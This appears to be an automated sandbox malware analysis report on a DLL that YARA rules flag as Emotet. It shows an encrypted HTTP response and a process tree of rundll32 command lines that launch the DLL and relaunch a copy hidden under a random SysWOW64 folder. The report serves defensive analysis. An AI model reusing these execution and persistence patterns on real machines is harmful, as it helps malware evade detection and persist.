                                                                                                            Connection: Keep-Alive
                                                                                                            Cache-Control: no-cache
                                                                                                            2021-12-02 08:37:03 UTC0INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 02 Dec 2021 08:37:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            2021-12-02 08:37:03 UTC0INData Raw: 32 35 36 0d 0a 73 be ca 7a 21 48 c8 2b 79 4b c2 72 82 e8 dd fb b0 56 4c 47 4b a2 7c 23 1b cd 24 12 83 2b 6d 00 6f 5b 28 cc be 61 69 07 46 c1 a1 5c e9 76 99 a1 73 90 4e c2 38 17 a8 f0 d9 9e 27 6a 88 9e d3 8d 86 66 a7 d2 ab 19 f8 92 2d f8 18 1b d8 97 6a fd 74 31 92 f5 b0 c8 9d c2 36 31 b4 69 a6 e2 c6 7b fe ff c9 0a ad 0e 10 c7 d2 78 73 00 d5 18 fb 70 e4 74 ff e6 08 2b 3b 43 1e 5f 43 1a 8a c4 84 85 01 4f 2b af 8f 37 7c 49 46 bc dd a0 5d 23 4c dd da 21 b8 7b 87 01 c4 2d 9b af 3e e3 91 40 57 b4 d2 2b 1b dd a2 4a 52 94 09 e4 6f 55 b3 62 d6 a3 4e 02 05 f7 31 24 ee c2 1c b8 3c 6d 2a 0a 54 fa 54 de 9d 14 7c d6 16 ea d3 12 67 58 f4 33 33 53 ee c7 b1 0b 2d 38 3d 1b b6 bb c2 97 d7 01 4d 54 93 14 67 cc 17 d1 08 fc d8 e1 04 e9 c7 5e 22 3c e4 c3 ad 05 f7 52 cc 20 28 ab
                                                                                                            Data Ascii: 256sz!H+yKrVLGK|#$+mo[(aiF\vsN8'jf-jt161i{xspt+;C_CO+7|IF]#L!{->@W+JRoUbN1$<m*TT|gX33S-8=MTg^"<R (


                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            Analysis Process: loaddll32.exe PID: 2616 Parent PID: 5360

                                                                                                            General

                                                                                                            Start time:09:33:16
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\loaddll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll"
                                                                                                            Imagebase:0x1240000
                                                                                                            File size:893440 bytes
                                                                                                            MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.516972039.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.545005644.000000000151C000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: cmd.exe PID: 2176 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:33:16
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                                                                                                            Imagebase:0x150000
                                                                                                            File size:232960 bytes
                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: rundll32.exe PID: 4132 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:33:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: rundll32.exe PID: 3256 Parent PID: 2176

                                                                                                            General

                                                                                                            Start time:09:33:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.471143849.000000000294A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: rundll32.exe PID: 1460 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:33:21
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.492232954.0000000002A3A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: rundll32.exe PID: 2500 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:33:25
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.494249926.00000000035DA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 6068 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:33:28
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 5668 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:33:38
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 5936 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:33:53
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 3772 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:34:11
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: SgrmBroker.exe PID: 1404 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:34:33
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                            Imagebase:0x7ff63cd60000
                                                                                                            File size:163336 bytes
                                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 5496 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:34:50
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: rundll32.exe PID: 5592 Parent PID: 3256

                                                                                                            General

                                                                                                            Start time:09:35:01
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: rundll32.exe PID: 5848 Parent PID: 4132

                                                                                                            General

                                                                                                            Start time:09:35:03
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg",diWFDzhLoc
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.592715201.000000000354A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                            Analysis Process: rundll32.exe PID: 5856 Parent PID: 1460

                                                                                                            General

                                                                                                            Start time:09:35:09
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: rundll32.exe PID: 3444 Parent PID: 2500

                                                                                                            General

                                                                                                            Start time:09:35:15
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 5160 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:35:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: WerFault.exe PID: 4956 Parent PID: 5160

                                                                                                            General

                                                                                                            Start time:09:35:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: WerFault.exe PID: 4460 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:35:19
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: WerFault.exe PID: 5020 Parent PID: 5160

                                                                                                            General

                                                                                                            Start time:09:35:27
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: WerFault.exe PID: 4976 Parent PID: 2616

                                                                                                            General

                                                                                                            Start time:09:35:29
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 4776 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:35:42
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: rundll32.exe PID: 1184 Parent PID: 5848

                                                                                                            General

                                                                                                            Start time:09:36:03
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                            Analysis Process: MpCmdRun.exe PID: 5352 Parent PID: 5496

                                                                                                            General

                                                                                                            Start time:09:36:03
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                            Imagebase:0x7ff6ac550000
                                                                                                            File size:455656 bytes
                                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: conhost.exe PID: 2144 Parent PID: 5352

                                                                                                            General

                                                                                                            Start time:09:36:04
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 5552 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:36:13
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 2968 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:36:37
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 4640 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:37:05
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Analysis Process: svchost.exe PID: 1460 Parent PID: 556

                                                                                                            General

                                                                                                            Start time:09:37:09
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Disassembly

                                                                                                            Code Analysis

                                                                                                            Reset < >